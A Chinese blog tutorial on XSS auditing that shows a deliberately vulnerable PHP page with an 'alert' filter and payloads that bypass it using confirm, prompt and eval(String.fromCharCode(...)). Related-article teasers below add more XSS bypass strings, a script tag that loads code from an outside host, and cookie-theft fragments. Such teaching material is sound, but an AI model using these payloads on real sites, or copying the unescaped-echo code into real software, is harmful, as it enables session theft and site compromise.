xss代码审计与注入方法(4)

最新推荐文章于 2024-09-11 00:04:15 发布
最新推荐文章于 2024-09-11 00:04:15 发布
阅读量171 收藏
点赞数
分类专栏: xss代码审计基础 文章标签: php html
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weirdo_d/article/details/120687250
版权
本文探讨了如何绕过PHP代码中对'alert'的过滤,通过使用类似'confirm'和'prompt'的弹窗方法以及利用String.fromCharCode()编码实现XSS攻击。示例代码和解决方案揭示了Web安全中的常见漏洞及其规避方式。
摘要由CSDN通过智能技术生成

对alert过滤绕过

0x00

 简单看下php代码,对alert进行了过滤包括其大小写

<?php require_once '../header.php'; 

if (preg_match('/alert/i', $_GET["name"])) {
  die("error");
}
?>

Hello <?php  echo $_GET["name"]; ?>

 0x01

可以使用类似alert的方法来弹窗比如confirm,prompt

<script>confirm('xss')</script>

<script>prompt('xss')</script>

 

0x02

通过编码绕过,String.fromCharCode()编码来绕过

<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 47, 120, 115, 115, 47, 41))</script>

 

 

cat weirdo
关注
专栏目录
跨站脚本漏洞
weixin_46729085的博客
09-08 3979
XSS漏洞 一、文章简介 XSS漏洞是Web应用程序最常见的漏洞之一。如果您的站点没有预防XSS漏洞的固定方法,那么很可能就存在XSS漏洞。 这篇文章将带你通过代码层面去理解三个问题: 什么是XSS漏洞? XSS漏洞有哪些分类? 如何防范XSS漏洞? 二:三大分类 反射型XSS:<非持久化> 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器没有这样的页面和内容),一般容易出现在搜索页面。 存储型XSS:&...
XSS漏洞的简介和利用
m0_46397814的博客
08-08 1264
跨站脚本攻击
xss过滤绕过笔记
内心不种满鲜花就会长满杂草
08-05 1210
事件驱动"是一种比较经典的编程思想。在网页会发生很多事件(比如鼠标移动,键盘输入等),JS 可以对这些事件进行响应。所以我们可以通过事件触发JS 函数,触发XSS。waf对了alert、confirm等关键词进行了拦截导致无法进行弹窗。如下get请求的变量返回到了js的一个变量,且变量用单引号包裹。将前面的单引号构造闭合并结束掉,再写弹窗的语句,再结束语句。,这里构造闭合,且``要进行url编码否则直接服务器报错。和 - 都代表一个语句的结束。输入的圆括号会自动转为||...
XSS 绕过常用语句
Mr.Huang_的博客
09-16 2976
XSS 绕过常用语句 写在最前面::: 下文 alert 都可以由 prompt 代替 最常用的 XSS 漏洞测试代码: <script>prompt("XSS")</script> <SCRIPT SRC=http://damit5.ml/xss.js></SCRIPT> 在输入(Input)标签里 <INPUT type="text" value='<SCRIPT>alert("XSS")</SCRIPT>'>
14.xss之alert绕过&cookie绕过
HWHXY的博客
12-25 4795
前言 该篇记录为记录实际的src过程第14篇小文章,内容为某网站的xssbypass。 XSS 特征 拦截了常见的alert和prompt,大小写无法绕过,eval无法绕过,alert.call无法绕过 xss绕过 alert用top[‘ale’+‘rt’]绕过 alert()用top[‘ale’+‘rt’].call绕过 cookie用document[变量]绕过 最终payload <img src=\"x\" onerror=\"c='coo'+'kie';top['ale'+'rt'].c
五种xss弹窗方式
火柴人的博客
07-20 1万+
1.alert() alert(‘xss’) alert(“xss”) alert(/xss/) alert(document.cookie) 2.confirm() confirm(‘xss’) confirm(“xss”) confirm(/xss/) confirm(document.cookie) 3.prompt() prompt(‘xss’) prompt(...
【安全】如何预防XSS攻击?
Milk~每天分享一点点,技术进步一点点
07-20 282
安全: 问题:常见的web前端攻击方式有哪些? XSS跨站请求攻击 XSRF跨站请求伪造 XSS攻击: 一个博客网站,我发表一篇博客,其嵌入<script>脚本 脚本内容:获取cookie,发送到我的服务器(服务器配合跨域) 发布这篇博客,有人查看它,我轻松收割访问者的cookie 演示代码: 初始化: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8">
xss代码审计注入方法(1)
weirdo_d的博客
10-10 112
xss基础注入 0x00 当一个网站的代码包含类似下面的语句。没有进行防护 <?php echo $_GET["name"]; ?> 0x01 用户名设为<script>alert(/xss/)</script>,则会执行预设好的JavaScript代码。 0x02 漏洞成因: 将不可信数据插入到HTML标签之间时;// 例如div, p, td; 0x03 xss部分位于在于输入框,输入...
xss代码审计注入方法(2)
weirdo_d的博客
10-08 241
xss基础大小写转换注入 0x00 XSS漏洞也叫跨站脚本攻击,是Web漏洞最常见的漏洞,原理与SQL注入相似,通过来自外部的输入直接在浏览器端触发。XSS漏洞通常被入侵者用来窃取Cookie等,本文以代码审计的形式研究XSS攻击原理、挖掘形式、防御方案及缺陷 0x01 下面一段代码: <?php $name = $_GET["name"]; $name = preg_replace("/<script>/","", $name); $name = preg
通过代码审计找出网站XSS漏洞实战
01-27
针对XSS漏洞的检测,一种有效的方法是进行代码审计。本文将详细介绍如何通过代码审计来定位和验证XSS漏洞。 一、找出关键位置 1. **找出控制器**:在Web应用,控制器通常是处理用户请求的关键组件。通过分析URL...
PHP防止SQL注入攻击和XSS攻击的两个简单方法
12-17
SQL注入是一种通过输入恶意SQL代码来欺骗数据库执行非预期操作的攻击方式。例如,如果用户输入的数据未经过滤直接拼接到SQL查询,攻击者可以通过特殊字符构造SQL语句来获取或修改数据库的信息。 **1. 使用`...
php-java+代码审计+代码审计软件seay+程序员+挖洞+代码审计漏洞查找+生成代码审计报告
03-08
"代码审计资料整理"可能包含各种教程、最佳实践和案例研究,这些资料可以帮助开发者系统地学习代码审计方法,提高审计技能,并从汲取经验教训,避免在实际开发重蹈覆辙。 **生成代码审计报告** 审计过程的...
XSS注入方式和逃避XSS过滤的常用方法
yinqiaohua的专栏
08-01 3万+
转自黑吧安全网http://www.myhack58.com/ web前端开发常见的安全问题就是会遭遇XSS注入,而常见的XSS注入有以下2种方式: 一、html标签注入 这是最常见的一种,主要入口为表单项(一般就是正则过滤不周全)、内联样式表(exploer) 正则过滤的解决办法,php一般会使用htmlspecialchars或者htmlentities函数进行
XSS多姿势执行alert
balance的博客
10-15 6502
以下归纳了多种执行alert函数的方式(前提是获得js执行上下文) ,可用于xss filter bypass 1、常规alert &lt;a href="javascript:alert()"&gt;XSS Test&lt;/a&gt; 2、字符串操作 Unicode字符以"\u"开头,例如\u00A9。Unicode码位用"\u{}"表示,例如\u{2F804} 十六进制以"\x"开头,
xss 替换<script>
aasyy6460的博客
11-16 721
<imgsrc=1onerror=alert(1)> 图片没有找到执行 alert 将<script> 改成大写不管用时使用 转载于:https://www.cnblogs.com/stucs/p/4101728.html
跨站脚本(XSS)的一些问题,解决<script>alert(42873)</script>
王伟峰聊下VB语言的一些心得
12-24 9643
问题:跨站脚本(XSS)的一些问题,主要漏洞证据: alert(42873),对于这个问题怎么解决? 方案一: 一、 过滤用户输入的内容,检查用户输入的内容是否有非法内容。如 二、严格控制输出 可以利用下面这些函数对出现xss漏洞的参数进行过滤 1、htmlspecialchars() 函数,用于转义处理在页面上显示的文本。 2、htmlentities() 函数,用于转义处理在页面
XSS插入绕过一些方式总结
热门推荐
煜铭2011
05-05 7万+
0x00前言 我们友情进行XSS检查,偶然跳出个小弹窗,其我们总结了一些平时可能用到的XSS插入方式,方便我们以后进行快速检查,也提供了一定的思路,其XSS有反射、存储、DOM这三类,至于具体每个类别的异同之处,本文不做学术介绍,直接介绍实际的插入方式。 0x01 常规插入及其绕过 1 Script 标签 绕过进行一次移除操作: <scr<script&g...
SQL注入(二)
qq_48947141的博客
09-23 695
一、按数据库类型 1、Oracle注入 1.1.Oracle基础知识 Oracle是目前最流行的C/S或B/S体系结构的数据库之一。 数据字典:数据字典是元数据的集合,从逻辑上和物理上描述了数据库及其内容,存储于SYSTEM与SYSAUX表空间内的若干段。 数据字典视图:数据字典的数据比较复杂,一般查询的是数据字典视图。 数据字典视图三种不同权限的分类:分别以user,all,dba的前缀开头。 常用的数据字典视图 表名 列名 user_tables:存储用户拥有表的信息
一码空传临时网盘PHP源码,支持提取码功能
最新发布
爱酷码的博客
09-11 368
一码空传临时网盘源码V2.0免费授权,该源码提供了一个简单易用的无数据库版临时网盘解决方案。前端采用了layui开发框架,后端使用原生PHP编写,没有引入任何开发框架,保持了代码的简洁和高效。这个程序使用了一个无数据库配置读写类,并借鉴了网络上的config文件读写代码。用户可以通过提取码来提取文件,无需上传文件到服务器。该程序还配备了一个后台管理系统,而且不需要数据库支持。用户上传的文件会保存在upload文件夹,并按照md5算法进行加密和重命名,确保每次加密结果都不相同。
XSS漏洞审计:通过代码审查定位关键点
"通过代码审计找出网站XSS漏洞实战" 在进行网站安全性审计时,XSS(跨站脚本)漏洞是一种常见的安全问题,它允许攻击者注入恶意脚本到用户的浏览器,从而窃取敏感信息或执行其他恶意操作。本文以实战的角度详细...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值